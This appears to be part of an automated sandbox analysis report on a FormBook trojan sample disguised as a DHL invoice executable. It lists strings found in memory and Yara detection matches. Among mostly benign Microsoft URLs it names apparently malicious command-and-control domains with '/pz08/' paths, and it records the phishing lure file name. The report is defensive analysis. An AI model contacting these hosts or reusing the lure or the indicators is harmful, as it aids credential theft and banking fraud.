Source: explorer.exe, 00000006.00000003.2284484234.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.papermoonnursery.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.papermoonnursery.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.papermoonnursery.com/pz08/www.anti-theft-device-82641.bond
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.papermoonnursery.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.permanentday.space
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.permanentday.space/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.permanentday.space/pz08/www.usetruerreview.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.permanentday.spaceReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyz
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyz/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyz/pz08/www.quickfibrokers.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyzReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickfibrokers.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickfibrokers.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickfibrokers.com/pz08/www.permanentday.space
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickfibrokers.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.com/pz08/www.ae-skinlab.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxibactrungnam.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxibactrungnam.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxibactrungnam.com/pz08/www.c2help.live
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taxibactrungnam.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.usetruerreview.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.usetruerreview.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.usetruerreview.com/pz08/www.bigtexture.xyz
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.usetruerreview.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.online
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.online/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.online/pz08/www.taxibactrungnam.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.onlineReferer:
Source: explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000006.00000003.3077066240.0000000007042000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1477551956.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077452667.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2808789548.000000000703F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3888210389.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.000000000702D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000002.3890474944.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000006.00000003.2284484234.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3890474944.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000003.2284484234.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3890474944.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 00000006.00000000.1487556831.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 00000006.00000000.1487556831.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000006.00000000.1487556831.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000003.2285909149.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2809145354.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000006.00000000.1487556831.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000006.00000002.3901744709.0000000010E5F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3885851208.00000000056BF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: systray.exe, 00000007.00000002.3885851208.00000000056BF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.tucowsdomains.com/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
